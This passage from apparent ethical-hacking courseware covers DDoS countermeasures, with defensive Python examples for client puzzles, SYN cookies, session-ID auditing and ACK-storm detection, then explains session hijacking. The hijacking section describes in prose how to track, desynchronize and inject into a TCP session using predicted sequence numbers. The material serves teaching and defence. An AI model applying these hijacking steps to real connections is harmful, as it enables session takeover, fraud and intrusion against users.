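    return bits == 0 or int.from_bytes(digest, "big") >> (256 - bits) == 0


def solve(chal: bytes, bits: int) -> int:
    """Client side: search a counter; expected cost is 2**bits hashes."""
    counter = 0
    while not _meets_difficulty(
            hashlib.sha256(chal + counter.to_bytes(COUNTER_LEN, "big")).digest(), bits):
        counter += 1
    return counter


def verify(client_id: str, slot: int, bits: int, counter: int) -> bool:
    """Server side: one HMAC plus one hash, however hard the puzzle was."""
    chal = challenge(client_id, slot)
    digest = hashlib.sha256(chal + counter.to_bytes(COUNTER_LEN, "big")).digest()
    return _meets_difficulty(digest, bits)


def admit_request(client_id: str, slot: int, current_rps: float,
                  normal_rps: float, counter=None) -> bool:
    """Gate a request: free when load is normal; otherwise only with a valid solution."""
    bits = difficulty_for_load(current_rps, normal_rps)
    if bits == 0:
        return True
    return counter is not None and verify(client_id, slot, bits, counter)


if __name__ == "__main__":
    slot = 1_700_000_000 // 60               # assumed: one-minute slots
    bits = difficulty_for_load(current_rps=800, normal_rps=100)   # 12 bits
    chal = challenge("203.0.113.7", slot)
    answer = solve(chal, bits)
    print(f"difficulty {bits} bits, solved with counter {answer}")
    print("admitted:", admit_request("203.0.113.7", slot, 800, 100, answer))
```

The asymmetry is the point: the zombie pays about 2^bits hashes per request while the server pays a constant amount to check, and because the challenge is an HMAC over the client identity and time slot, the server keeps no per-client state that a flood could exhaust. The cap on difficulty is what keeps the mechanism from becoming its own denial of service for legitimate clients on slow hardware.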

Post-Attack Forensics
Traffic Pattern Analysis
During a DDoS attack, the traffic pattern tool stores post-attack data, which users analyze to identify characteristics unique to the attacking traffic. These data are helpful in updating load balancing and throttling countermeasures to enhance their efficiency and protection ability. Moreover, DDoS attack traffic patterns can help network administrators develop new filtering techniques to prevent DDoS attack traffic from entering or leaving their networks. Analyzing DDoS traffic patterns can also help network administrators ensure that an attacker cannot use their servers as a DDoS platform to break into other sites.
Zombie Zapper Tool
When a company is unable to ensure the security of its servers and a DDoS attack starts, the network IDS notices the high volume of traffic, which indicates a potential problem. The targeted victim can run Zombie Zapper to stop packets from flooding the system. There are two versions of Zombie Zapper: one runs on UNIX, while the other runs on Windows. Currently, this tool acts as a defense mechanism against Trinoo, Tribe Flood Network (TFN), Shaft, and Stacheldraht.
Packet Traceback
Packet traceback refers to tracing back attack traffic. It is similar to reverse engineering. In this method, the targeted victim works backward by tracing the packet to its source. Once the victim identifies the true source, they can take steps to block further attacks from that source by developing the necessary preventive techniques. In addition, packet traceback can assist in gaining knowledge of the various tools and techniques that an

attacker uses. This information can help in developing and implementing different filtering techniques to block attacks.
Event Log Analysis
DDoS event logs assist in forensic investigation and the enforcement of laws, which is helpful when an attacker causes severe financial damage. Providers can use honeypots and other network security mechanisms such as firewalls, packet sniffers, and server logs to store all the events that occurred during the setup and execution of the attack. This allows network administrators to recognize the type of DDoS attack or the combination of attacks used. Router, firewall, and IDS logs can be analyzed to identify the source of the DoS traffic. Further, network administrators can attempt to trace back the attacker's IP address with the help of intermediary ISPs and law enforcement agencies.

Techniques to Defend against Botnets
There are four techniques to defend against botnets:
RFC 3704 Filtering
RFC 3704 filtering is a basic access-control list (ACL) filter, which limits the impact of DDoS attacks by blocking traffic with spoofed addresses. This filter requires packets to be sourced from valid, allocated address space that is consistent with the topology and space allocation. A "bogon list" consists of all unused or reserved IP addresses that should never appear as the source of traffic arriving from the Internet. If a packet is sourced from any of the IP addresses in the bogon list, then the packet is from a spoofed source IP, and the filter should drop it. System administrators should check whether the ISP performs RFC 3704 filtering upstream, before traffic enters their system. Because the bogon list changes regularly, if the ISP does not perform RFC 3704 filtering, the system administrator must maintain their own bogon ACL rules or switch to another ISP.
Cisco IPS Source IP Reputation Filtering
Reputation services help in determining whether an IP or service is a source of threat. Cisco Global Correlation, a security capability of Cisco IPS 7.0, uses immense security intelligence. The Cisco SensorBase Network contains information about known threats on the Internet, such as botnets, malware outbreaks, darknets, and botnet harvesters. The Cisco IPS makes use of this network to filter DoS traffic before it damages critical assets. To detect and prevent malicious activity even earlier, it incorporates global threat data into its system.

Black Hole Filtering
Black-hole filtering is a common technique to defend against botnets and, thus, to prevent DoS attacks. Black holes refer to network nodes wherein incoming traffic is discarded or dropped without informing the source that the data did not reach the intended recipient. Undesirable traffic can be dropped before it enters a protected network with a technique called remotely triggered black-hole (RTBH) filtering. As this is a remotely triggered process, this filtering must be performed in conjunction with the ISP. It uses Border Gateway Protocol (BGP) host routes to route traffic destined for the victim's servers to a "null0" next hop.

DDoS Prevention Offerings from ISP or DDoS Service
This method is effective in preventing IP spoofing at the ISP level. Here, the ISP scrubs/cleans traffic before allowing it to enter a user's Internet link. Because this service runs in the cloud, DDoS attacks do not saturate the Internet links. In addition, some third parties offer cloud DDoS prevention services.

IP Source Guard (in Cisco) or similar features can be enabled in other routers to filter traffic based on the DHCP snooping binding database or IP source bindings, which prevent bots from sending spoofed packets.

Additional DoS/DDoS Countermeasures
Implementing defensive mechanisms at the proper places and following proper measures strengthens organizational network security. The following is a list of countermeasures for combating DoS/DDoS attacks:
- Use strong encryption mechanisms such as WPA and AES 256 for broadband networks to defend against eavesdropping
- Ensure that the software and protocols are up-to-date and scan the machines thoroughly to detect any anomalous behavior
- Update the kernel to the latest release and disable unused and insecure services
- Block all inbound packets originating from the service ports to block the traffic from reflection servers
- Enable TCP SYN cookie protection
- Prevent the transmission of fraudulently addressed packets at the ISP level
- Implement cognitive radios in the physical layer to handle jamming and scrambling attacks
- Configure the firewall to deny external ICMP traffic access
- Secure remote administration and connectivity testing
- Perform thorough input validation
- Stop data processed by the attacker from being executed
- Prevent the use of unnecessary functions such as gets and strcpy
- Prevent the return addresses from being overwritten

DoS/DDoS Protection at ISP Level
One of the best ways to defend against DoS attacks is to block them at the gateway. This task is performed by the contracted ISP. ISPs offer a "clean pipes" service-level agreement that provides an assured bandwidth of genuine traffic, rather than the total bandwidth of all traffic. Most ISPs simply block all requests during a DDoS attack, denying even legitimate traffic from accessing the service. If an ISP does not provide clean-pipes services, subscription services provided by many cloud service providers can be used. The subscription services serve as an intermediary, receive traffic destined for the network, filter it, and then pass on only trusted connections. Vendors such as Imperva and Verisign offer services for cloud protection against DoS attacks.
ISPs offer in-the-cloud DDoS protection for Internet links to avoid saturation due to an attack. This type of protection redirects attack traffic to the ISP during an attack. Administrators can request ISPs to block the original affected IP and move their site to another IP after performing DNS propagation.

Figure 10.34: DoS/DDoS protection at the ISP level
Enabling TCP Intercept on Cisco IOS Software
Source: https://www.cisco.com
TCP intercept can be enabled by executing the commands given in the below table in the global configuration mode.

Step | Command | Purpose
1 | access-list access-list-number {deny | permit} tcp any destination destination-wildcard | Defines an IP extended access list
2 | ip tcp intercept list access-list-number | Enables TCP intercept

Table 10.1: Steps to enable TCP intercept on Cisco IOS
An access list achieves three purposes:
1. Interception of all requests
2. Interception of only requests originating from specific networks
3. Interception of only requests destined for specific servers
Typically, an access list defines the source as any source and the destination as specific networks or servers. As it is unimportant to know who to intercept packets from, the source addresses are not filtered. Rather, the destination server or network to be protected is identified. TCP intercept can operate in either the active intercept mode or the passive watch mode. The default is the intercept mode.
In the active intercept mode, the Cisco IOS software actively intercepts all inbound connection requests (SYN) and replies with a SYN-ACK on behalf of the server, following which it waits for an acknowledgement (ACK) from the client. On receiving the ACK from the client, the software sends the original SYN to the server and completes a three-way handshake with the server. Once the three-way handshake is complete, the two half connections are linked.
In the passive watch mode, connection requests from the user pass through to the server, and the software only watches until the connection is established. If a connection request fails to establish within 30 s, the software sends a reset to the server to clear its state.
The below table presents the command to set the TCP intercept mode in the global configuration mode.

Command | Purpose
ip tcp intercept mode {intercept | watch} | Set the TCP intercept mode

Table 10.2: Command to set the TCP intercept mode in the global configuration mode
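Both the "Enable TCP SYN cookie protection" countermeasure listed earlier and the active intercept mode above answer a SYN on behalf of the server before committing any server-side state. The following Python model is an added example, not Cisco's code and not part of the courseware; it implements the classic SYN cookie layout (5 bits of coarse time, 3 bits of MSS class, a 24-bit keyed hash of the 4-tuple), and the secret, the addresses and the fixed clock value are constructed for the demonstration.

```python
import hashlib
import hmac
import ipaddress
import struct
import time

# MSS values that fit in the cookie's 3-bit field (classic Bernstein layout).
MSS_TABLE = (536, 1300, 1440, 1460)


class SynCookieListener:
    """Stateless handling of the first two handshake packets.

    The listener keeps NO record of a half-open connection. The ISN it puts in
    the SYN-ACK is a cookie encoding a coarse timestamp, the client's MSS class
    and a keyed hash of the 4-tuple. Only a third packet whose ACK number equals
    cookie+1, and whose hash verifies, makes the server allocate state, so a SYN
    flood from spoofed sources costs the server nothing per packet.
    """

    def __init__(self, secret, now=None, max_age_units=2):
        self.secret = secret
        self.now = now                      # fixed clock for tests; None = wall clock
        self.max_age_units = max_age_units  # cookies older than this are rejected

    def _counter(self):
        # 64-second granularity; only its low 5 bits travel in the cookie
        t = self.now if self.now is not None else int(time.time())
        return t >> 6

    def _mac(self, saddr, sport, daddr, dport, counter):
        msg = (ipaddress.ip_address(saddr).packed + struct.pack("!H", sport)
               + ipaddress.ip_address(daddr).packed + struct.pack("!H", dport)
               + struct.pack("!I", counter))
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:3], "big")        # 24-bit tag

    def on_syn(self, saddr, sport, daddr, dport, client_mss):
        """Return the ISN to send in the SYN-ACK; nothing is stored."""
        counter = self._counter()
        mss_idx = 0
        for i, mss in enumerate(MSS_TABLE):
            if mss <= client_mss:
                mss_idx = i                                # largest class <= client MSS
        tag = self._mac(saddr, sport, daddr, dport, counter)
        return ((counter & 0x1F) << 27) | (mss_idx << 24) | tag

    def on_ack(self, saddr, sport, daddr, dport, ack_number):
        """Validate the third packet. Returns the negotiated MSS on success,
        None if the cookie is forged, stale, or belongs to another 4-tuple."""
        cookie = (ack_number - 1) & 0xFFFFFFFF
        t_bits, mss_idx, tag = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
        now = self._counter()
        for age in range(self.max_age_units + 1):         # accept recent counters only
            candidate = now - age
            if (candidate & 0x1F) == t_bits and \
                    self._mac(saddr, sport, daddr, dport, candidate) == tag:
                return MSS_TABLE[mss_idx]
        return None


def handshake_demo():
    """Constructed exchange: a real client completes the handshake, an ACK
    for a different source port fails, and a replay after the window fails."""
    srv = SynCookieListener(secret=b"constructed-secret-rotate-me", now=1_000_000)
    client = ("198.51.100.7", 40000)
    server = ("203.0.113.10", 443)
    isn = srv.on_syn(*client, *server, client_mss=1460)   # SYN in, SYN-ACK(isn) out
    good = srv.on_ack(*client, *server, ack_number=isn + 1)
    wrong_port = srv.on_ack(client[0], 40001, *server, ack_number=isn + 1)
    srv.now += 64 * (srv.max_age_units + 1)               # advance past the window
    stale = srv.on_ack(*client, *server, ack_number=isn + 1)
    return good, wrong_port, stale


if __name__ == "__main__":
    print(handshake_demo())   # (1460, None, None)
```

Because the server remembers nothing between the SYN and the ACK, TCP options that are not encoded in the cookie (window scaling, SACK) are lost for that connection; that trade-off is why production stacks only switch to cookies once the SYN backlog fills.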

DoS/DDoS Protection Tools
This section discusses various hardware and software DoS/DDoS protection tools such as FortiDDoS, DDoS Protector, Imperva Incapsula, and Anti DDoS Guardian that are effective in safeguarding networks from DoS/DDoS attacks.

Advanced DDoS Protection Appliances
The following are examples of appliances that provide advanced protection against DDoS attacks.

FortiDDoS-1200B
Source: https://www.fortinet.com
FortiDDoS provides comprehensive protection against DDoS attacks. It helps protect Internet infrastructure from threats and service disruptions by surgically removing network and application layer DDoS attacks while letting legitimate traffic flow without being impacted.

DDoS Protector
Source: https://www.checkpoint.com
Check Point DDoS Protector blocks DDoS attacks with multi-layered protection. Its advantages are listed as follows:
- Blocks a wide range of attacks with customized multi-layered protection

- Behavioral protection base-lining multiple elements and blocking abnormal traffic
- Automatically generated and predefined signatures
- Use of advanced challenge/response techniques
- Fast response time to protect against attacks within seconds
- Automatically defends against network flood and application layer attacks
- Customized protection optimized to meet the security needs of a specific network environment
- Quickly filters traffic before it reaches the firewall to protect networks and servers as well as block exploits
- Flexible deployment options to protect any business
- Integrated with Check Point Security Management

Figure 10.36: DDoS Protector
Terabit DDoS Protection System
Source: https://terabitsecurity.com
Terabit DDoS Protection System (DPS) is a solution for the detection and subsequent treatment of DDoS attacks. Terabit DPS helps ensure the maximum availability of a network and eliminates any disruptions caused by DoS/DDoS attacks. It can be used for large networks of bandwidth up to 1 Tbps. It can also provide protection for bandwidth up to 6.4 Tbps.

Figure 10.37: Terabit DPS appliance
A10 Thunder TPS
Source: https://www.a10networks.com
A10 Thunder Threat Protection System (TPS) ensures reliable access to key network services by detecting and blocking external threats such as DDoS and other cyber-attacks before they escalate into costly service outages. Its features are listed as follows:
- Custom protection with immediate blocking

- Proactive DDoS detection and mitigation
- Combined on-premises and cloud-based DDoS protection
- Built-in SSL inspection to block encrypted traffic
- Inbound reputation-based DDoS protection
- Inbound and outbound advanced threat protection

Figure 10.38: A10 Thunder TPS

DoS/DDoS Protection Tools

Imperva Incapsula DDoS Protection
Source: https://www.incapsula.com
Imperva Incapsula DDoS protection quickly mitigates any size attack without disrupting legitimate traffic or increasing latency. It is designed to provide multiple DDoS protection options and supports unicast and anycast technologies to power a many-to-many defense methodology. It automatically detects and mitigates attacks exploiting application and server vulnerabilities, hit-and-run events, and large botnets. Incapsula proxies all web requests to block DDoS attacks from being relayed to client origin servers. Incapsula detects and mitigates any type of attack, including TCP SYN+ACK, TCP FIN, TCP RESET, TCP ACK, TCP ACK+PSH, TCP fragmentation, UDP, Slowloris, spoofing, ICMP, IGMP, HTTP flood, brute force, connection flood, DNS flood, NXDomain, mixed SYN+UDP or ICMP+UDP flood, ping of death, reflected ICMP & UDP, and Smurf.

Figure 10.39: Screenshot of Incapsula DDoS protection tool
The following are examples of additional DDoS protection tools:
- Anti DDoS Guardian (http://www.beethink.com)
- DOSarrest's DDoS protection service (https://www.dosarrest.com)
- DDOS-GUARD (https://ddos-guard.net)
- Cloudflare (https://www.cloudflare.com)
- F5 (https://f5.com)

DoS/DDoS Protection Services

Akamai DDoS Protection
Source: https://www.akamai.com
Akamai provides DDoS protection for enterprises regularly targeted by DDoS attacks. Akamai Kona Site Defender delivers multi-layered defense that effectively protects websites and web applications against the increasing threat, sophistication, and scale of DDoS attacks. Kona Site Defender provides unmatched web and application protection, which is delivered through an intelligent platform with more than 210,000 servers over 120 countries. Network-layer DDoS traffic is deflected and application layer DDoS traffic is absorbed in the network edge, while mitigation capabilities are implemented natively in-path, protecting against application layer attacks in the cloud before they reach the client origin. Kona Site Defender has a highly scalable web application firewall (WAF) offering protection against application layer attacks in HTTP and HTTPS traffic, providing a complete DDoS protection solution for enterprises to maintain web performance and availability.

Figure 10.40: Akamai DDoS protection service

The following are examples of additional DDoS protection services:
- Kaspersky DDoS Protection Tool (https://www.kaspersky.com)
- Stormwall PRO (https://stormwall.pro)
- Corero Network Security (https://www.corero.com)
- Nexusguard (https://www.nexusguard.com)
- BlockDoS (https://www.blockdos.net)

Module Summary
In this module, we discussed concepts related to denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks. We also discussed various types of DoS/DDoS attacks. Additionally, this module discussed concepts related to botnets along with the botnet ecosystem. Further, a detailed case study of a DDoS attack on GitHub was presented. Moreover, this module illustrated various DoS/DDoS attack tools and concluded with a detailed discussion on various countermeasures to prevent DoS/DDoS attacks, along with various hardware and software DoS/DDoS protection tools.
In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform session hijacking to steal a valid session ID.

Module 11: Session Hijacking

Module Objectives
Session hijacking allows attackers to take over an active session by bypassing the authentication process. Thereafter, they can perform any action on the hijacked system. This module aims to provide comprehensive information on session hijacking. It starts with an introduction to session hijacking concepts and provides insight into session hijacking at the application and network levels. Later, the module discusses tools used to hijack a session between a client and server. It also discusses various countermeasures to defend against session hijacking attacks.

At the end of this module, you will be able to do the following:
- Describe session hijacking concepts
- Perform application level session hijacking
- Perform network level session hijacking
- Use different session hijacking tools
- Apply session hijacking countermeasures

Session Hijacking Concepts
Familiarization with basic concepts related to session hijacking is important to attain a comprehensive understanding. This section explains what session hijacking is as well as the reasons why session hijacking succeeds. It also discusses the session hijacking process, packet analysis of a local session hijack, types of session hijacking, session hijacking in an Open Systems Interconnection (OSI) model, and differences between spoofing and hijacking.

What is Session Hijacking?
A web server sends a session identification token or key to a web client after successful authentication. These session tokens differentiate multiple sessions that the server establishes with clients. Web servers use various mechanisms to generate random tokens and controls to secure the tokens during transmission.
Session hijacking is an attack in which an attacker takes over a valid Transmission Control Protocol (TCP) communication session between two computers. Because most types of authentication are performed only at the start of a TCP session, an attacker can gain access to a machine while a session is in progress. Attackers can sniff all the traffic from established TCP sessions and perform identity theft, information theft, fraud, etc.
A session hijacking attack exploits a session-token generation mechanism or token security controls so that the attacker can establish an unauthorized connection with a target server. The attacker can guess or steal a valid session ID, which identifies authenticated users, and use it to establish a session with the server. The web server responds to the attacker's requests under the impression that it is communicating with an authenticated user.
Attackers can use session hijacking to launch various kinds of attacks, such as man-in-the-middle (MITM) and denial-of-service (DoS) attacks. In an MITM attack, an attacker places themselves between an authorized client and a server by performing session hijacking to ensure that information flowing in either direction passes through them. However, the client and server believe they are directly communicating with each other. Attackers can also sniff sensitive information and disrupt sessions to launch a DoS attack.

Figure 11.1: Example of session hijacking
Why is Session Hijacking Successful?
Session hijacking succeeds because of the following factors.
- Absence of account lockout for invalid session IDs: If a website does not implement account lockout, an attacker can make several attempts to connect with varying session IDs embedded in a genuine URL. The attacker can continue making attempts until the actual session ID is determined. This attack is also known as a brute-force attack. During a brute-force attack, the web server does not display a warning message or complaint, allowing the attacker to determine the valid session ID.
- Weak session-ID generation algorithm or small session IDs: Most websites use linear algorithms with predictable variables such as time or IP address for generating session IDs. By studying the sequential pattern and generating multiple requests, an attacker can easily narrow the search space necessary to forge a valid session ID. Even if a strong session-ID generation algorithm is used, an active session ID can be easily determined if the string is short.
- Insecure handling of session IDs: An attacker can retrieve stored session-ID information by misleading the user's browser into visiting another site. Before the session expires, the attacker can exploit the information in many ways, such as Domain Name System (DNS) poisoning, cross-site scripting exploitation, and the exploitation of a bug in the browser.
- Indefinite session timeout: Session IDs with an indefinite expiration time provide an attacker with unlimited time to guess a valid session ID. An example of this is the "remember me" option in many websites. The attacker can use static session IDs to access the user's web account after capturing the user's cookie file. The attacker can also perform

session hijacking if they can break into a proxy server, which potentially logs or caches session IDs.
- Most computers using TCP/Internet Protocol (IP) are vulnerable: All machines running TCP/IP are vulnerable to session hijacking because of the design flaws inherent in TCP/IP.
- Most countermeasures do not work without encryption: It is easy to sniff session IDs in a flat network if transport security is not set up properly during the transmission of session ID cookies, even if a web application uses Secure Sockets Layer (SSL) encryption. An attacker's task becomes even easier if they capture session IDs containing actual login information.
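Several of the factors above (linear generation, short IDs, indefinite lifetime, IDs sent without transport protection) can be checked from the defender's side. The following Python audit is an added example, not from the courseware: the weak sample IDs are constructed (a 32-bit counter stepping by 4), the 128-bit minimum and hex alphabet are assumptions to be tuned per site, and the cookie attributes are the standard Set-Cookie attributes that address the transport and timeout factors.

```python
import math
import secrets

# Constructed sample of weak identifiers: a 32-bit counter advancing by 4 per login.
WEAK_IDS = ["0001a3f0", "0001a3f4", "0001a3f8", "0001a3fc"]
# IDs from a CSPRNG, 256 bits each, for comparison.
STRONG_IDS = [secrets.token_hex(32) for _ in range(4)]


def linear_pattern(ids):
    """Return the constant step if the hex IDs form an arithmetic progression
    (the 'linear algorithm' weakness), else None."""
    values = [int(s, 16) for s in ids]
    diffs = {b - a for a, b in zip(values, values[1:])}
    return diffs.pop() if len(diffs) == 1 else None


def search_space_bits(sample_id, alphabet_size=16):
    """Upper bound on the entropy an ID of this length can carry."""
    return len(sample_id) * math.log2(alphabet_size)


def audit(ids, alphabet_size=16, min_bits=128):
    """Findings for a batch of observed session IDs (empty list = no issue).
    min_bits is an assumed site policy, not a value from the courseware."""
    findings = []
    step = linear_pattern(ids)
    if step is not None:
        findings.append(f"predictable: IDs increase by a constant {step}")
    bits = search_space_bits(ids[0], alphabet_size)
    if bits < min_bits:
        findings.append(f"too short: at most {bits:.0f} bits, want >= {min_bits}")
    return findings


def generate_session_id(nbytes=32):
    """Replacement generator: CSPRNG output, 8*nbytes bits of entropy."""
    return secrets.token_hex(nbytes)


def session_cookie_header(session_id, max_age=900):
    """Set-Cookie line whose attributes address the factors above: Secure
    (no cleartext transmission), HttpOnly (not readable by injected script),
    SameSite, and a bounded lifetime instead of an indefinite timeout."""
    return (f"Set-Cookie: SESSIONID={session_id}; Path=/; Max-Age={max_age}; "
            "Secure; HttpOnly; SameSite=Strict")


if __name__ == "__main__":
    print("weak  :", audit(WEAK_IDS) or "no findings")
    print("strong:", audit(STRONG_IDS) or "no findings")
    print(session_cookie_header(generate_session_id()))
```

The linearity check only catches the simplest generators; for anything else, collect a few thousand IDs and run a proper randomness test suite, and never rely on ID secrecy alone without account lockout on repeated invalid IDs.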

Session Hijacking Process
It is easier for an attacker to sneak into a system as a genuine user than to enter a system directly. An attacker can hijack a genuine user's session by finding an established session and taking it over after user authentication. After hijacking the session, the attacker can stay connected for hours without arousing suspicion. During this period, all traffic intended for the user's IP address goes to the attacker's system instead, and the attacker can plant backdoors or gain additional access to the system. Here, we examine how an attacker hijacks a session.

Figure 11.2: Session hijacking process

Session hijacking can be divided into three broad phases.

Tracking the connection
The attacker uses a network sniffer to track a victim and host or uses a tool such as Nmap to scan the network for a target with a TCP sequence that is easy to predict. After identifying a victim, the attacker captures the sequence and acknowledgment numbers of the victim because TCP checks these numbers. The attacker then uses these numbers to construct packets.

Desynchronizing the connection
A desynchronized state occurs when a connection between a target and host is established, or stable with no data transmission, or the server's sequence number is not equal to the client's acknowledgment number, or vice versa.
To desynchronize the connection between the target and host, the attacker must change the sequence number or acknowledgment number (SEQ/ACK) of the server. For this purpose, the attacker sends null data to the server; consequently, the server's SEQ/ACK numbers advance, while the target machine does not register the increment. For example, before desynchronization, the attacker monitors the session without any interference, following which they send a large amount of null data to the server. These data change the ACK number on the server without affecting anything else, thereby desynchronizing the server and target.
Another approach is to send a reset flag to the server to break the connection on the server side. Ideally, this occurs in the early setup stage of the connection. The attacker's goal is to break the connection on the server side and create a new connection with a different sequence number.
The attacker waits for a SYN/ACK packet from the server to the host. On detecting a packet, the attacker immediately sends an RST packet and a SYN packet with identical parameters, such as a port number, but with a different sequence number, to the server. The server, on receiving the RST packet, closes the connection with the target and initiates another one based on the SYN packet but with a different sequence number on the same port. After opening a new connection, the server sends a SYN/ACK packet to the target for acknowledgement. The attacker detects (but does not intercept) this packet and sends an ACK packet to the server. Now, the server is in the established state. The aim is to keep the target conversant and ensure that it switches to the established state on receiving the first SYN/ACK packet from the server. Consequently, both the server and target are desynchronized but in an established state.

An attacker can also use a FIN flag, but this will make the server respond with an ACK packet, thus revealing the attack through an ACK storm. The attack is revealed because of a flaw in this method of hijacking a TCP connection. While receiving an unacceptable packet, the host acknowledges it by sending the expected sequence number. This unacceptable packet generates an ACK packet, thereby creating an endless loop for every data packet. The mismatch in SEQ/ACK numbers results in excess network traffic

with both the server and target attempting to verify the correct sequence. Because these packets carry no data, retransmission does not occur if the packet is lost. However, because TCP uses IP, the loss of a single packet ends the unwanted conversation between the server and target.
An attacker can add a desynchronizing stage to the hijack sequence to deceive the target host. Without desynchronizing, the attacker injects data into the server while keeping their identity hidden by spoofing an IP address. However, the attacker should ensure that the server responds to the target host as well.

Injecting the attacker's packet
Once the attacker has interrupted the connection between the server and target, they can either inject data into the network or actively participate as the man in the middle, passing data from the target to the server and vice-versa while reading and injecting data at will.
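The ACK storm described above is visible on the wire, which makes it a detection opportunity for the defender: two peers that repeat the same SEQ/ACK pair in a burst of empty ACKs disagree about the sequence space, whereas a normal transfer produces empty ACKs whose ACK number keeps advancing. The following Python detector is an added example, not part of the courseware; it runs over constructed segment records (a normal download and a storm, both between the documentation addresses 198.51.100.7 and 203.0.113.10), and the window and threshold values are assumptions to tune per environment.

```python
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    ts: float
    src: str
    sport: int
    dst: str
    dport: int
    flags: str      # e.g. "S", "SA", "A", "PA"
    payload: int    # bytes of data carried
    seq: int
    ack: int


def flow_key(seg):
    """Direction-independent key so both halves of a conversation are counted."""
    return tuple(sorted(((seg.src, seg.sport), (seg.dst, seg.dport))))


def detect_ack_storms(segments, window=1.0, threshold=20):
    """Flag flows with more than `threshold` bare ACKs (no data, only the ACK
    flag) inside `window` seconds whose SEQ/ACK pairs do not move: normal
    receivers acknowledge new bytes each time, storming peers repeat themselves."""
    recent = defaultdict(deque)   # flow -> (ts, seq, ack) of bare ACKs in window
    alerts = {}
    for seg in sorted(segments, key=lambda s: s.ts):
        if seg.flags != "A" or seg.payload != 0:
            continue
        key = flow_key(seg)
        q = recent[key]
        q.append((seg.ts, seg.seq, seg.ack))
        while q and seg.ts - q[0][0] > window:
            q.popleft()
        distinct = {(s, a) for _, s, a in q}
        if len(q) > threshold and len(distinct) <= 2 and key not in alerts:
            alerts[key] = {"bare_acks_in_window": len(q),
                           "distinct_seq_ack_pairs": len(distinct),
                           "first_seen": seg.ts}
    return alerts


def _legit_transfer():
    """Constructed: server pushes 30 data segments, client ACKs each one."""
    segs = []
    for i in range(30):
        t = 10.0 + i * 0.02
        segs.append(Segment(t, "203.0.113.10", 443, "198.51.100.7", 51000,
                            "PA", 1460, 5000 + i * 1460, 900))
        segs.append(Segment(t + 0.01, "198.51.100.7", 51000, "203.0.113.10", 443,
                            "A", 0, 900, 5000 + (i + 1) * 1460))
    return segs


def _ack_storm():
    """Constructed: both peers re-send the same empty ACK 40 times in 0.2 s."""
    segs = []
    for i in range(40):
        t = 20.0 + i * 0.005
        segs.append(Segment(t, "203.0.113.10", 443, "198.51.100.7", 52000,
                            "A", 0, 7000, 1420))          # server's view
        segs.append(Segment(t + 0.002, "198.51.100.7", 52000, "203.0.113.10", 443,
                            "A", 0, 1720, 7000))          # client's conflicting view
    return segs


SAMPLE_CAPTURE = _legit_transfer() + _ack_storm()

if __name__ == "__main__":
    for key, info in detect_ack_storms(SAMPLE_CAPTURE).items():
        print("ACK storm between", key, info)
```

The same logic can be fed from a packet capture by mapping each record into a Segment; the distinct-pair test is what keeps a fast, healthy download from tripping the counter.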

Packet Analysis of a Local Session Hijack
Session hijacking involves high-level attack vectors, which affect many systems. TCP is used for transmitting data by many systems that establish LAN or Internet connections. For establishing a connection between two systems and for the successful transmission of data, the two systems should perform a three-way handshake. Session hijacking involves the exploitation of this three-way handshake method to take control over the session.
To conduct a session hijacking attack, the attacker performs three activities:
- Tracking of a session
- Desynchronization of the session
- Injection of commands during the session
By sniffing network traffic, an attacker can monitor or track a session. The next step in session hijacking is to desynchronize the session. It is easy to accomplish this attack if the attacker knows the next sequence number (NSN) used by the client. A session can be hijacked by using that sequence number before the client uses it. There are two possibilities to determine sequence numbers: one is to sniff the traffic, find an ACK packet, and then determine the NSN based on the ACK packet. The other is to transmit data with guessed sequence numbers, which is not a reliable method. If the attacker can access the network and sniff the TCP session, they can easily determine the sequence number. This type of session hijacking is called "local session hijacking."

The below figure shows the packet analysis of a local session hijack.

Figure 11.3: Packet analysis of a local session hijack

According to the above figure, the next expected sequence number is 1420. If the attacker transmits a packet with that sequence number before the user does, they can desynchronize the connection between the user and server. If the attacker sent the data with the expected sequence number before the user could, the server would be synchronized with the attacker. This leads to the establishment of a connection between the attacker and server. Then, the server would drop the data sent by the user with the correct sequence number, believing it to be a resent packet. The user is unaware of the attacker's action and may resend the data packet because the user does not receive an ACK for their TCP packet. However, the server would drop all the packets resent by the user. Thus, the local session hijacking attack is successfully completed.
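To make the sequence-number reasoning in Figure 11.3 concrete, the following Python model is an added example (not the courseware's code and not any real TCP stack) of a receiver's acceptance rule: data is accepted only at RCV.NXT, anything entirely below it is treated as a retransmission, and every segment is answered with the next byte expected. The expected sequence number 1420 is taken from the figure; the 100-byte payloads and the "user" and "third party" labels are constructed.

```python
class TcpReceiver:
    """Minimal model of a TCP endpoint's receive side."""

    def __init__(self, rcv_nxt):
        self.rcv_nxt = rcv_nxt
        self.delivered = []   # (source, data) handed to the application
        self.log = []         # (source, seq, verdict, ack_sent)

    def receive(self, source, seq, data):
        """Return (verdict, ack_number) for one incoming data segment."""
        end = seq + len(data)
        if seq == self.rcv_nxt:
            verdict = "accepted"
            self.delivered.append((source, data))
            self.rcv_nxt = end
        elif end <= self.rcv_nxt:
            # every byte already acknowledged: looks like a retransmission
            verdict = "dropped as retransmission"
        elif seq < self.rcv_nxt < end:
            # partial overlap: keep only the bytes not yet seen
            verdict = "accepted (overlap trimmed)"
            self.delivered.append((source, data[self.rcv_nxt - seq:]))
            self.rcv_nxt = end
        else:
            verdict = "held out of order"   # real stacks queue it; model just notes it
        self.log.append((source, seq, verdict, self.rcv_nxt))
        return verdict, self.rcv_nxt


def replay_figure_11_3():
    """Constructed replay of the scenario in the text: the server expects 1420,
    a third party uses that number first, then the real user sends and resends."""
    server = TcpReceiver(rcv_nxt=1420)
    outcomes = [
        server.receive("third party", 1420, b"X" * 100),  # seq 1420: accepted
        server.receive("user", 1420, b"U" * 100),          # now below RCV.NXT: dropped
        server.receive("user", 1420, b"U" * 100),          # retransmission: dropped again
    ]
    return outcomes, server.delivered


if __name__ == "__main__":
    outcomes, delivered = replay_figure_11_3()
    for (verdict, ack), (source, seq, _, _) in zip(outcomes, [
            ("third party", 1420, 0, 0), ("user", 1420, 0, 0), ("user", 1420, 0, 0)]):
        print(f"{source:>12} seq={seq}: {verdict}, ACK sent = {ack}")
    print("application received from:", [src for src, _ in delivered])
```

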